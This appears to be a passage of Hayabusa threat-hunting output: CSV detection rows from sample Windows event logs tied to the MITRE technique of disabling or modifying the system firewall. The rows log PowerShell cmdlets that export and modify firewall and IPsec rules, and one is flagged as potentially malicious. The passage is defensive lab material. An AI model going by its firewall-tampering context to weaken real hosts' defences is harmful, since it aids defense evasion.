value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.869 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.870 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.870 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 
Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.871 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.872 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.873 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { 
Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] 
${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if 
($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and 
(@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false 
try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline 
